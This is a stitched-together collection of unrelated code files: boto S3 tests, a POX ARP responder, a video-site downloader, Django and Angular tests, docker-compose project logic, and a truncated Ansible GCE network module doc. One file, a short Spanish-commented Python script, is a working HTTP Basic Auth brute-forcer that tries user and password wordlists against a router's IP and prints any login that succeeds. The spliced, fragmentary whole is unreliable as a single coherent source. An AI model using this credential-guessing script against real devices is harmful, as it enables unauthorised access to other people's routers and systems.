    self.assertEqual(rs.next_marker, "b")
    # ensure bucket.list() still works by just
    # popping elements off the front of expected.
    rs = self.bucket.list()
    for element in rs:
        self.assertEqual(element.name, expected.pop(0))
    self.assertEqual(expected, [])
def test_list_with_url_encoding(self):
    """Non-ASCII key names must round-trip through encoding_type='url'."""
    expected = ["α", "β", "γ"]
    for key_name in expected:
        key = self.bucket.new_key(key_name)
        key.set_contents_from_string(key_name)
    # ensure bucket.list() still works by just
    # popping elements off the front of expected.
    orig_getall = self.bucket._get_all
    # Force tiny pages (max_keys=2) so pagination is exercised as well.
    getall = lambda *a, **k: orig_getall(*a, max_keys=2, **k)
    with patch.object(self.bucket, '_get_all', getall):
        rs = self.bucket.list(encoding_type="url")
        for element in rs:
            # Names come back percent-encoded; decode before comparing.
            name = urllib.parse.unquote(element.name.encode('utf-8'))
            self.assertEqual(name, expected.pop(0))
        self.assertEqual(expected, [])
def test_logging(self):
    """Enable bucket logging with extra grants and read the status back."""
    # use self.bucket as the target bucket so that teardown
    # will delete any log files that make it into the bucket
    # automatically and all we have to do is delete the
    # source bucket.
    sb_name = "src-" + self.bucket_name
    sb = self.conn.create_bucket(sb_name)
    # grant log write perms to target bucket using canned-acl
    self.bucket.set_acl("log-delivery-write")
    target_bucket = self.bucket_name
    target_prefix = u"jp/ログ/"  # non-ASCII prefix on purpose
    # Check existing status is disabled
    bls = sb.get_logging_status()
    self.assertEqual(bls.target, None)
    # Create a logging status and grant auth users READ PERM
    authuri = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
    authr = Grant(permission="READ", type="Group", uri=authuri)
    sb.enable_logging(target_bucket, target_prefix=target_prefix, grants=[authr])
    # Check the status and confirm its set.
    bls = sb.get_logging_status()
    self.assertEqual(bls.target, target_bucket)
    self.assertEqual(bls.prefix, target_prefix)
    self.assertEqual(len(bls.grants), 1)
    self.assertEqual(bls.grants[0].type, "Group")
    self.assertEqual(bls.grants[0].uri, authuri)
    # finally delete the src bucket
    sb.delete()
def test_tagging(self):
    """Set tags from raw XML, read them back, then verify deletion
    surfaces as a NoSuchTagSet error."""
    tagging = """
        <Tagging>
          <TagSet>
             <Tag>
               <Key>tagkey</Key>
               <Value>tagvalue</Value>
             </Tag>
          </TagSet>
        </Tagging>
    """
    self.bucket.set_xml_tags(tagging)
    response = self.bucket.get_tags()
    self.assertEqual(response[0][0].key, 'tagkey')
    self.assertEqual(response[0][0].value, 'tagvalue')
    self.bucket.delete_tags()
    # After deletion, fetching tags must raise S3ResponseError with
    # code 'NoSuchTagSet' -- anything else (or no error) is a failure.
    try:
        self.bucket.get_tags()
    except S3ResponseError as e:
        self.assertEqual(e.code, 'NoSuchTagSet')
    except Exception as e:
        self.fail("Wrong exception raised (expected S3ResponseError): %s"
                  % e)
    else:
        self.fail("Expected S3ResponseError, but no exception raised.")
def test_tagging_from_objects(self):
    """Create tags from python objects rather than raw xml."""
    tag_set = TagSet()
    tag_set.add_tag('akey', 'avalue')
    tag_set.add_tag('anotherkey', 'anothervalue')
    tags = Tags()
    tags.add_tag_set(tag_set)
    self.bucket.set_tags(tags)
    response = self.bucket.get_tags()
    expected = [('akey', 'avalue'), ('anotherkey', 'anothervalue')]
    for index, (key, value) in enumerate(expected):
        self.assertEqual(response[0][index].key, key)
        self.assertEqual(response[0][index].value, value)
def test_website_configuration(self):
    """Configure website hosting and verify both dict and XML forms."""
    response = self.bucket.configure_website('index.html')
    self.assertTrue(response)
    config = self.bucket.get_website_configuration()
    self.assertEqual(config, {'WebsiteConfiguration':
                              {'IndexDocument': {'Suffix': 'index.html'}}})
    # The *_with_xml variant must agree with the parsed dict form.
    config2, xml = self.bucket.get_website_configuration_with_xml()
    self.assertEqual(config, config2)
    self.assertTrue('<Suffix>index.html</Suffix>' in xml, xml)
def test_website_redirect_all_requests(self):
    """RedirectAllRequestsTo round-trips, with and without a protocol."""
    response = self.bucket.configure_website(
        redirect_all_requests_to=RedirectLocation('example.com'))
    config = self.bucket.get_website_configuration()
    self.assertEqual(config, {
        'WebsiteConfiguration': {
            'RedirectAllRequestsTo': {
                'HostName': 'example.com'}}})
    # Can configure the protocol as well.
    response = self.bucket.configure_website(
        redirect_all_requests_to=RedirectLocation('example.com', 'https'))
    config = self.bucket.get_website_configuration()
    self.assertEqual(config, {
        'WebsiteConfiguration': {'RedirectAllRequestsTo': {
            'HostName': 'example.com',
            'Protocol': 'https',
        }}}
    )
def test_lifecycle(self):
lifecycle = Lifecycle()
lifecycle.add_rule('myid', '', 'Enabled', 30)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
self.assertEqual(len(response), 1)
actual_lifecycle = response[0]
self.assertEqual(actual_lifecycle.id, 'myid')
self.assertEqual(actual_lifecycle.prefix, '')
self.assertEqual(actual_lifecycle.status, 'Enabled')
self.assertEqual(actual_lifecycle.transition, None)
def test_lifecycle_with_glacier_transition(self):
lifecycle = Lifecycle()
transition = Transition(days=30, storage_class='GLACIER')
rule = Rule('myid', prefix='', status='Enabled', expiration=None,
transition=transition)
lifecycle.append(rule)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
transition = response[0].transition
self.assertEqual(transition.days, 30)
self.assertEqual(transition.storage_class, 'GLACIER')
self.assertEqual(transition.date, None)
def test_lifecycle_multi(self):
date = '2022-10-12T00:00:00.000Z'
sc = 'GLACIER'
lifecycle = Lifecycle()
lifecycle.add_rule("1", "1/", "Enabled", 1)
lifecycle.add_rule("2", "2/", "Enabled", Expiration(days=2))
lifecycle.add_rule("3", "3/", "Enabled", Expiration(date=date))
lifecycle.add_rule("4", "4/", "Enabled", None,
Transition(days=4, storage_class=sc))
lifecycle.add_rule("5", "5/", "Enabled", None,
Transition(date=date, storage_class=sc))
# set the lifecycle
self.bucket.configure_lifecycle(lifecycle)
# read the lifecycle back
readlifecycle = self.bucket.get_lifecycle_config();
for rule in readlifecycle:
if rule.id == "1":
self.assertEqual(rule.prefix, "1/")
self.assertEqual(rule.expiration.days, 1)
elif rule.id == "2":
self.assertEqual(rule.prefix, "2/")
self.assertEqual(rule.expiration.days, 2)
elif rule.id == "3":
self.assertEqual(rule.prefix, "3/")
self.assertEqual(rule.expiration.date, date)
elif rule.id == "4":
self.assertEqual(rule.prefix, "4/")
self.assertEqual(rule.transition.days, 4)
self.assertEqual(rule.transition.storage_class, sc)
elif rule.id == "5":
self.assertEqual(rule.prefix, "5/")
self.assertEqual(rule.transition.date, date)
self.assertEqual(rule.transition.storage_class, sc)
else:
self.fail("unexpected id %s" % rule.id)
def test_lifecycle_jp(self):
# test lifecycle with Japanese prefix
name = "Japanese files"
prefix = "日本語/"
days = 30
lifecycle = Lifecycle()
lifecycle.add_rule(name, prefix, "Enabled", days)
# set the lifecycle
self.bucket.configure_lifecycle(lifecycle)
# read the lifecycle back
readlifecycle = self.bucket.get_lifecycle_config();
for rule in readlifecycle:
self.assertEqual(rule.id, name)
self.assertEqual(rule.expiration.days, days)
#Note: Boto seems correct? AWS seems broken?
#self.assertEqual(rule.prefix, prefix)
def test_lifecycle_with_defaults(self):
lifecycle = Lifecycle()
lifecycle.add_rule(expiration=30)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
self.assertEqual(len(response), 1)
actual_lifecycle = response[0]
self.assertNotEqual(len(actual_lifecycle.id), 0)
self.assertEqual(actual_lifecycle.prefix, '')
def test_lifecycle_rule_xml(self):
# create a rule directly with id, prefix defaults
rule = Rule(status='Enabled', expiration=30)
s = rule.to_xml()
# Confirm no ID is set in the rule.
self.assertEqual(s.find("<ID>"), -1)
# Confirm Prefix is '' and not set to 'None'
self.assertNotEqual(s.find("<Prefix></Prefix>"), -1) | unknown | codeparrot/codeparrot-clean | ||
import urllib.request as ur
import http.client
import sys
def get_realm(ip):
realm_router = ""
try:
conn = http.client.HTTPConnection(ip)
conn.request("GET", "/")
res = conn.getresponse()
realm_router = res.getheader("WWW-Authenticate")
realm_router = realm_router.split("=")[1].strip("\"")
return realm_router
except Exception as e:
print(e)
sys.exit(0)
def atack(ip, users, passwords):
passwords = passwords.read().split("\n")
find = False
realm_router = get_realm(ip)
for u in users:
u2 = u.strip()
for p in passwords:
p2 = p.strip()
try:
auth_handler = ur.HTTPBasicAuthHandler()
auth_handler.add_password(realm=realm_router,
uri=ip,
user=u2,
passwd=p2)
opener = ur.build_opener(auth_handler)
ur.install_opener(opener)
pag = ur.urlopen("http://" + str(ip))
if(pag.getcode() == 200):
print(chr(27) + "[1;34m[+]"+ chr(27)
+ "[0m Login found: " + str(u2) + ":" + str(p2))
find = True
except:
print(chr(27) + "[1;31m[-] "+ chr(27)
+ "[0m" + str(u2) + ":" + str(p2) + " >> failed" )
if not find:
print("Login not found.")
#Inicio del programa
if __name__ == "__main__":
ip = input("Introduce la IP: ")
try:
users = input("Archivo con los usuarios: ")
users = open(users, "r")
passwords = input("Archivos con las contraseñas: ")
passwords = open(passwords, "r")
except:
print("Imposible leer el fichero")
sys.exit(0)
atack(ip, users, passwords) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2011,2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An ARP utility that can learn and proxy ARPs, and can also answer queries
from a list of static entries.
This adds the "arp" object to the console, which you can use to look at
or modify the ARP table.
Add ARP entries on commandline like:
arp_responder --<IP>=<MAC> --<IP>=<MAC>
Leave MAC unspecified if you want to use the switch MAC.
"""
from pox.core import core
import pox
log = core.getLogger()
from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST
from pox.lib.packet.arp import arp
from pox.lib.packet.vlan import vlan
from pox.lib.addresses import IPAddr, EthAddr
from pox.lib.util import dpid_to_str, str_to_bool
from pox.lib.recoco import Timer
from pox.lib.revent import EventHalt
import pox.openflow.libopenflow_01 as of
import time
# Timeout for ARP entries
ARP_TIMEOUT = 60 * 4
class Entry (object):
"""
We use the MAC to answer ARP replies.
We use the timeout so that if an entry is older than ARP_TIMEOUT, we
flood the ARP request rather than try to answer it ourselves.
"""
def __init__ (self, mac, static = None, flood = None):
self.timeout = time.time() + ARP_TIMEOUT
self.static = False
self.flood = True
if mac is True:
# Means use switch's MAC, implies static/noflood
self.mac = True
self.static = True
self.flood = False
else:
self.mac = EthAddr(mac)
if static is not None:
self.static = static
if flood is not None:
self.flood = flood
def __eq__ (self, other):
if isinstance(other, Entry):
return (self.static,self.mac)==(other.static,other.mac)
else:
return self.mac == other
def __ne__ (self, other):
return not self.__eq__(other)
@property
def is_expired (self):
if self.static: return False
return time.time() > self.timeout
class ARPTable (dict):
def __repr__ (self):
o = []
for k,e in self.iteritems():
t = int(e.timeout - time.time())
if t < 0:
t = "X"
else:
t = str(t) + "s left"
if e.static: t = "-"
mac = e.mac
if mac is True: mac = "<Switch MAC>"
o.append((k,"%-17s %-20s %3s" % (k, mac, t)))
for k,t in _failed_queries.iteritems():
if k not in self:
t = int(time.time() - t)
o.append((k,"%-17s %-20s %3ss ago" % (k, '?', t)))
o.sort()
o = [e[1] for e in o]
o.insert(0,"-- ARP Table -----")
if len(o) == 1:
o.append("<< Empty >>")
return "\n".join(o)
def __setitem__ (self, key, val):
key = IPAddr(key)
if not isinstance(val, Entry):
val = Entry(val)
dict.__setitem__(self, key, val)
def __delitem__ (self, key):
key = IPAddr(key)
dict.__delitem__(self, key)
def set (self, key, value=True, static=True):
if not isinstance(value, Entry):
value = Entry(value, static=static)
self[key] = value
def _dpid_to_mac (dpid):
# Should maybe look at internal port MAC instead?
return EthAddr("%012x" % (dpid & 0xffFFffFFffFF,))
def _handle_expiration ():
for k,e in _arp_table.items():
if e.is_expired:
del _arp_table[k]
for k,t in _failed_queries.items():
if time.time() - t > ARP_TIMEOUT:
del _failed_queries[k]
class ARPResponder (object):
def __init__ (self):
# This timer handles expiring stuff
self._expire_timer = Timer(5, _handle_expiration, recurring=True)
core.addListeners(self)
def _handle_GoingUpEvent (self, event):
core.openflow.addListeners(self)
log.debug("Up...")
def _handle_ConnectionUp (self, event):
if _install_flow:
fm = of.ofp_flow_mod()
fm.priority = 0x7000 # Pretty high
fm.match.dl_type = ethernet.ARP_TYPE
fm.actions.append(of.ofp_action_output(port=of.OFPP_CONTROLLER))
event.connection.send(fm)
def _handle_PacketIn (self, event):
# Note: arp.hwsrc is not necessarily equal to ethernet.src
# (one such example are arp replies generated by this module itself
# as ethernet mac is set to switch dpid) so we should be careful
# to use only arp addresses in the learning code!
squelch = False
dpid = event.connection.dpid
inport = event.port
packet = event.parsed
if not packet.parsed:
log.warning("%s: ignoring unparsed packet", dpid_to_str(dpid))
return
a = packet.find('arp')
if not a: return
log.debug("%s ARP %s %s => %s", dpid_to_str(dpid),
{arp.REQUEST:"request",arp.REPLY:"reply"}.get(a.opcode,
'op:%i' % (a.opcode,)), str(a.protosrc), str(a.protodst))
if a.prototype == arp.PROTO_TYPE_IP:
if a.hwtype == arp.HW_TYPE_ETHERNET:
if a.protosrc != 0:
if _learn:
# Learn or update port/MAC info
if a.protosrc in _arp_table:
if _arp_table[a.protosrc] != a.hwsrc:
log.warn("%s RE-learned %s: %s->%s", dpid_to_str(dpid),
a.protosrc, _arp_table[a.protosrc].mac, a.hwsrc)
else:
log.info("%s learned %s", dpid_to_str(dpid), a.protosrc)
_arp_table[a.protosrc] = Entry(a.hwsrc)
if a.opcode == arp.REQUEST:
# Maybe we can answer
if a.protodst in _arp_table:
# We have an answer...
r = arp()
r.hwtype = a.hwtype
r.prototype = a.prototype
r.hwlen = a.hwlen
r.protolen = a.protolen
r.opcode = arp.REPLY
r.hwdst = a.hwsrc
r.protodst = a.protosrc
r.protosrc = a.protodst
mac = _arp_table[a.protodst].mac
if mac is True:
# Special case -- use ourself
mac = _dpid_to_mac(dpid)
r.hwsrc = mac
e = ethernet(type=packet.type, src=_dpid_to_mac(dpid),
dst=a.hwsrc)
e.payload = r
if packet.type == ethernet.VLAN_TYPE:
v_rcv = packet.find('vlan')
e.payload = vlan(eth_type = e.type,
payload = e.payload,
id = v_rcv.id,
pcp = v_rcv.pcp)
e.type = ethernet.VLAN_TYPE
log.info("%s answering ARP for %s" % (dpid_to_str(dpid),
str(r.protosrc)))
msg = of.ofp_packet_out()
msg.data = e.pack()
msg.actions.append(of.ofp_action_output(port =
of.OFPP_IN_PORT))
msg.in_port = inport
event.connection.send(msg)
return EventHalt if _eat_packets else None
else:
# Keep track of failed queries
squelch = a.protodst in _failed_queries
_failed_queries[a.protodst] = time.time()
if self._check_for_flood(dpid, a):
# Didn't know how to handle this ARP, so just flood it
msg = "%s flooding ARP %s %s => %s" % (dpid_to_str(dpid),
{arp.REQUEST:"request",arp.REPLY:"reply"}.get(a.opcode,
'op:%i' % (a.opcode,)), a.protosrc, a.protodst)
if squelch:
log.debug(msg)
else:
log.info(msg)
msg = of.ofp_packet_out()
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
msg.data = event.ofp
event.connection.send(msg.pack())
return EventHalt if _eat_packets else None
def _check_for_flood (self, dpid, a):
"""
Return True if you want to flood this
"""
if a.protodst in _arp_table:
return _arp_table[a.protodst].flood
return True
_arp_table = ARPTable() # IPAddr -> Entry
_install_flow = None
_eat_packets = None
_failed_queries = {} # IP -> time : queries we couldn't answer
_learn = None
def launch (timeout=ARP_TIMEOUT, no_flow=False, eat_packets=True,
no_learn=False, **kw):
global ARP_TIMEOUT, _install_flow, _eat_packets, _learn
ARP_TIMEOUT = timeout
_install_flow = not no_flow
_eat_packets = str_to_bool(eat_packets)
_learn = not no_learn
core.Interactive.variables['arp'] = _arp_table
for k,v in kw.iteritems():
_arp_table[IPAddr(k)] = Entry(v, static=True)
core.registerNew(ARPResponder) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
__all__ = ['veoh_download']
from ..common import *
import urllib.error
def veoh_download(url, output_dir = '.', merge = False, info_only = False, **kwargs):
'''Get item_id'''
if re.match(r'http://www.veoh.com/watch/\w+', url):
item_id = match1(url, r'http://www.veoh.com/watch/(\w+)')
elif re.match(r'http://www.veoh.com/m/watch.php\?v=\.*', url):
item_id = match1(url, r'http://www.veoh.com/m/watch.php\?v=(\w+)')
else:
raise NotImplementedError('Cannot find item ID')
veoh_download_by_id(item_id, output_dir = '.', merge = False, info_only = info_only, **kwargs)
#----------------------------------------------------------------------
def veoh_download_by_id(item_id, output_dir = '.', merge = False, info_only = False, **kwargs):
"""Source: Android mobile"""
webpage_url = 'http://www.veoh.com/m/watch.php?v={item_id}&quality=1'.format(item_id = item_id)
#grab download URL
a = get_content(webpage_url, decoded=True)
url = match1(a, r'<source src="(.*?)\"\W')
#grab title
title = match1(a, r'<meta property="og:title" content="([^"]*)"')
type_, ext, size = url_info(url)
print_info(site_info, title, type_, size)
if not info_only:
download_urls([url], title, ext, total_size=None, output_dir=output_dir, merge=merge)
site_info = "Veoh"
download = veoh_download
download_playlist = playlist_not_supported('veoh') | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals
import json
from django.contrib.gis.geos import LinearRing, Point, Polygon
from django.core import serializers
from django.test import TestCase, mock, skipUnlessDBFeature
from django.utils import six
from .models import City, MultiFields, PennsylvaniaCity
@skipUnlessDBFeature("gis_enabled")
class GeoJSONSerializerTests(TestCase):
fixtures = ['initial']
def test_builtin_serializers(self):
"""
'geojson' should be listed in available serializers.
"""
all_formats = set(serializers.get_serializer_formats())
public_formats = set(serializers.get_public_serializer_formats())
self.assertIn('geojson', all_formats),
self.assertIn('geojson', public_formats)
def test_serialization_base(self):
geojson = serializers.serialize('geojson', City.objects.all().order_by('name'))
try:
geodata = json.loads(geojson)
except Exception:
self.fail("Serialized output is not valid JSON")
self.assertEqual(len(geodata['features']), len(City.objects.all()))
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Point')
self.assertEqual(geodata['features'][0]['properties']['name'], 'Chicago')
def test_geometry_field_option(self):
"""
When a model has several geometry fields, the 'geometry_field' option
can be used to specify the field to use as the 'geometry' key.
"""
MultiFields.objects.create(
city=City.objects.first(), name='Name', point=Point(5, 23),
poly=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))))
geojson = serializers.serialize('geojson', MultiFields.objects.all())
geodata = json.loads(geojson)
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Point')
geojson = serializers.serialize('geojson', MultiFields.objects.all(),
geometry_field='poly')
geodata = json.loads(geojson)
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Polygon')
def test_fields_option(self):
"""
The fields option allows to define a subset of fields to be present in
the 'properties' of the generated output.
"""
PennsylvaniaCity.objects.create(name='Mansfield', county='Tioga', point='POINT(-77.071445 41.823881)')
geojson = serializers.serialize('geojson', PennsylvaniaCity.objects.all(),
fields=('county', 'point'))
geodata = json.loads(geojson)
self.assertIn('county', geodata['features'][0]['properties'])
self.assertNotIn('founded', geodata['features'][0]['properties'])
def test_srid_option(self):
geojson = serializers.serialize('geojson', City.objects.all().order_by('name'), srid=2847)
geodata = json.loads(geojson)
self.assertEqual(
[int(c) for c in geodata['features'][0]['geometry']['coordinates']],
[1564802, 5613214])
@mock.patch('django.contrib.gis.serializers.geojson.HAS_GDAL', False)
def test_without_gdal(self):
# Without coordinate transformation, the serialization should succeed:
serializers.serialize('geojson', City.objects.all())
with six.assertRaisesRegex(self, serializers.base.SerializationError, '.*GDAL is not installed'):
# Coordinate transformations need GDAL
serializers.serialize('geojson', City.objects.all(), srid=2847)
def test_deserialization_exception(self):
"""
GeoJSON cannot be deserialized.
"""
with self.assertRaises(serializers.base.SerializerDoesNotExist):
serializers.deserialize('geojson', '{}') | unknown | codeparrot/codeparrot-clean | ||
/*!
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.dev/license
*/
import {TestBed} from '@angular/core/testing';
import {AppComponent} from './app.component';
import {provideRouter, withComponentInputBinding} from '@angular/router';
import {routes} from './routing/routes';
import {Search, WINDOW} from '@angular/docs';
import {provideHttpClient} from '@angular/common/http';
import {provideHttpClientTesting} from '@angular/common/http/testing';
describe('AppComponent', () => {
const fakeSearch = {};
const fakeWindow = {location: {hostname: 'angular.dev'}};
it('should create the app', async () => {
await TestBed.configureTestingModule({
imports: [AppComponent],
providers: [
provideHttpClient(),
provideHttpClientTesting(),
provideRouter(routes, withComponentInputBinding()),
{
provide: WINDOW,
useValue: fakeWindow,
},
{
provide: Search,
useValue: fakeSearch,
},
],
}).compileComponents();
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.componentInstance;
expect(app).toBeTruthy();
});
}); | typescript | github | https://github.com/angular/angular | adev/src/app/app.component.spec.ts |
from __future__ import unicode_literals
from __future__ import absolute_import
from functools import reduce
import logging
from docker.errors import APIError
from .config import get_service_name_from_net, ConfigurationError
from .const import DEFAULT_TIMEOUT, LABEL_PROJECT, LABEL_SERVICE, LABEL_ONE_OFF
from .container import Container
from .legacy import check_for_legacy_containers
from .service import Service
from .utils import parallel_execute
log = logging.getLogger(__name__)
def sort_service_dicts(services):
# Topological sort (Cormen/Tarjan algorithm).
unmarked = services[:]
temporary_marked = set()
sorted_services = []
def get_service_names(links):
return [link.split(':')[0] for link in links]
def get_service_dependents(service_dict, services):
name = service_dict['name']
return [
service for service in services
if (name in get_service_names(service.get('links', [])) or
name in service.get('volumes_from', []) or
name == get_service_name_from_net(service.get('net')))
]
def visit(n):
if n['name'] in temporary_marked:
if n['name'] in get_service_names(n.get('links', [])):
raise DependencyError('A service can not link to itself: %s' % n['name'])
if n['name'] in n.get('volumes_from', []):
raise DependencyError('A service can not mount itself as volume: %s' % n['name'])
else:
raise DependencyError('Circular import between %s' % ' and '.join(temporary_marked))
if n in unmarked:
temporary_marked.add(n['name'])
for m in get_service_dependents(n, services):
visit(m)
temporary_marked.remove(n['name'])
unmarked.remove(n)
sorted_services.insert(0, n)
while unmarked:
visit(unmarked[-1])
return sorted_services
class Project(object):
"""
A collection of services.
"""
def __init__(self, name, services, client):
self.name = name
self.services = services
self.client = client
def labels(self, one_off=False):
return [
'{0}={1}'.format(LABEL_PROJECT, self.name),
'{0}={1}'.format(LABEL_ONE_OFF, "True" if one_off else "False"),
]
@classmethod
def from_dicts(cls, name, service_dicts, client):
"""
Construct a ServiceCollection from a list of dicts representing services.
"""
project = cls(name, [], client)
for service_dict in sort_service_dicts(service_dicts):
links = project.get_links(service_dict)
volumes_from = project.get_volumes_from(service_dict)
net = project.get_net(service_dict)
project.services.append(Service(client=client, project=name, links=links, net=net,
volumes_from=volumes_from, **service_dict))
return project
@property
def service_names(self):
return [service.name for service in self.services]
def get_service(self, name):
"""
Retrieve a service by name. Raises NoSuchService
if the named service does not exist.
"""
for service in self.services:
if service.name == name:
return service
raise NoSuchService(name)
def validate_service_names(self, service_names):
"""
Validate that the given list of service names only contains valid
services. Raises NoSuchService if one of the names is invalid.
"""
valid_names = self.service_names
for name in service_names:
if name not in valid_names:
raise NoSuchService(name)
def get_services(self, service_names=None, include_deps=False):
"""
Returns a list of this project's services filtered
by the provided list of names, or all services if service_names is None
or [].
If include_deps is specified, returns a list including the dependencies for
service_names, in order of dependency.
Preserves the original order of self.services where possible,
reordering as needed to resolve dependencies.
Raises NoSuchService if any of the named services do not exist.
"""
if service_names is None or len(service_names) == 0:
return self.get_services(
service_names=self.service_names,
include_deps=include_deps
)
else:
unsorted = [self.get_service(name) for name in service_names]
services = [s for s in self.services if s in unsorted]
if include_deps:
services = reduce(self._inject_deps, services, [])
uniques = []
[uniques.append(s) for s in services if s not in uniques]
return uniques
def get_links(self, service_dict):
links = []
if 'links' in service_dict:
for link in service_dict.get('links', []):
if ':' in link:
service_name, link_name = link.split(':', 1)
else:
service_name, link_name = link, None
try:
links.append((self.get_service(service_name), link_name))
except NoSuchService:
raise ConfigurationError('Service "%s" has a link to service "%s" which does not exist.' % (service_dict['name'], service_name))
del service_dict['links']
return links
def get_volumes_from(self, service_dict):
volumes_from = []
if 'volumes_from' in service_dict:
for volume_name in service_dict.get('volumes_from', []):
try:
service = self.get_service(volume_name)
volumes_from.append(service)
except NoSuchService:
try:
container = Container.from_id(self.client, volume_name)
volumes_from.append(container)
except APIError:
raise ConfigurationError('Service "%s" mounts volumes from "%s", which is not the name of a service or container.' % (service_dict['name'], volume_name))
del service_dict['volumes_from']
return volumes_from
def get_net(self, service_dict):
if 'net' in service_dict:
net_name = get_service_name_from_net(service_dict.get('net'))
if net_name:
try:
net = self.get_service(net_name)
except NoSuchService:
try:
net = Container.from_id(self.client, net_name)
except APIError:
raise ConfigurationError('Service "%s" is trying to use the network of "%s", which is not the name of a service or container.' % (service_dict['name'], net_name))
else:
net = service_dict['net']
del service_dict['net']
else:
net = None
return net
def start(self, service_names=None, **options):
for service in self.get_services(service_names):
service.start(**options)
def stop(self, service_names=None, **options):
parallel_execute(
objects=self.containers(service_names),
obj_callable=lambda c: c.stop(**options),
msg_index=lambda c: c.name,
msg="Stopping"
)
def kill(self, service_names=None, **options):
parallel_execute(
objects=self.containers(service_names),
obj_callable=lambda c: c.kill(**options),
msg_index=lambda c: c.name,
msg="Killing"
)
def remove_stopped(self, service_names=None, **options):
all_containers = self.containers(service_names, stopped=True)
stopped_containers = [c for c in all_containers if not c.is_running]
parallel_execute(
objects=stopped_containers,
obj_callable=lambda c: c.remove(**options),
msg_index=lambda c: c.name,
msg="Removing"
)
def restart(self, service_names=None, **options):
for service in self.get_services(service_names):
service.restart(**options)
def build(self, service_names=None, no_cache=False):
for service in self.get_services(service_names):
if service.can_be_built():
service.build(no_cache)
else:
log.info('%s uses an image, skipping' % service.name)
def up(self,
service_names=None,
start_deps=True,
allow_recreate=True,
force_recreate=False,
do_build=True,
timeout=DEFAULT_TIMEOUT):
if force_recreate and not allow_recreate:
raise ValueError("force_recreate and allow_recreate are in conflict")
services = self.get_services(service_names, include_deps=start_deps)
for service in services:
service.remove_duplicate_containers()
plans = self._get_convergence_plans(
services,
allow_recreate=allow_recreate,
force_recreate=force_recreate,
)
return [
container
for service in services
for container in service.execute_convergence_plan(
plans[service.name],
do_build=do_build,
timeout=timeout
)
]
def _get_convergence_plans(self,
services,
allow_recreate=True,
force_recreate=False):
plans = {}
for service in services:
updated_dependencies = [
name
for name in service.get_dependency_names()
if name in plans
and plans[name].action == 'recreate'
]
if updated_dependencies and allow_recreate:
log.debug(
'%s has upstream changes (%s)',
service.name, ", ".join(updated_dependencies),
)
plan = service.convergence_plan(
allow_recreate=allow_recreate,
force_recreate=True,
)
else:
plan = service.convergence_plan(
allow_recreate=allow_recreate,
force_recreate=force_recreate,
)
plans[service.name] = plan
return plans
def pull(self, service_names=None):
for service in self.get_services(service_names, include_deps=True):
service.pull()
def containers(self, service_names=None, stopped=False, one_off=False):
if service_names:
self.validate_service_names(service_names)
else:
service_names = self.service_names
containers = [
Container.from_ps(self.client, container)
for container in self.client.containers(
all=stopped,
filters={'label': self.labels(one_off=one_off)})]
def matches_service_names(container):
return container.labels.get(LABEL_SERVICE) in service_names
if not containers:
check_for_legacy_containers(
self.client,
self.name,
self.service_names,
)
return filter(matches_service_names, containers)
def _inject_deps(self, acc, service):
dep_names = service.get_dependency_names()
if len(dep_names) > 0:
dep_services = self.get_services(
service_names=list(set(dep_names)),
include_deps=True
)
else:
dep_services = []
dep_services.append(service)
return acc + dep_services
class NoSuchService(Exception):
def __init__(self, name):
self.name = name
self.msg = "No such service: %s" % self.name
def __str__(self):
return self.msg
class DependencyError(ConfigurationError):
pass | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_net
version_added: "1.5"
short_description: create/destroy GCE networks and firewall rules
description:
- This module can create and destroy Google Compute Engine networks and
firewall rules U(https://developers.google.com/compute/docs/networking).
The I(name) parameter is reserved for referencing a network while the
I(fwname) parameter is used to reference firewall rules.
IPv4 Address ranges must be specified using the CIDR
U(http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) format.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
allowed:
description:
- the protocol:ports to allow ('tcp:80' or 'tcp:80,443' or 'tcp:80-800;udp:1-25')
required: false
default: null
aliases: []
ipv4_range:
description:
- the IPv4 address range in CIDR notation for the network
required: false
aliases: ['cidr']
fwname:
description:
- name of the firewall rule
required: false
default: null
aliases: ['fwrule']
name:
description:
- name of the network
required: false
default: null
aliases: []
src_range:
description:
- the source IPv4 address range in CIDR notation
required: false
default: null
aliases: ['src_cidr']
src_tags:
description:
- the source instance tags for creating a firewall rule
required: false
default: null
aliases: []
target_tags:
version_added: "1.9"
description:
- the target instance tags for creating a firewall rule
required: false
default: null
aliases: []
state:
description:
- desired state of the persistent disk
required: false
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
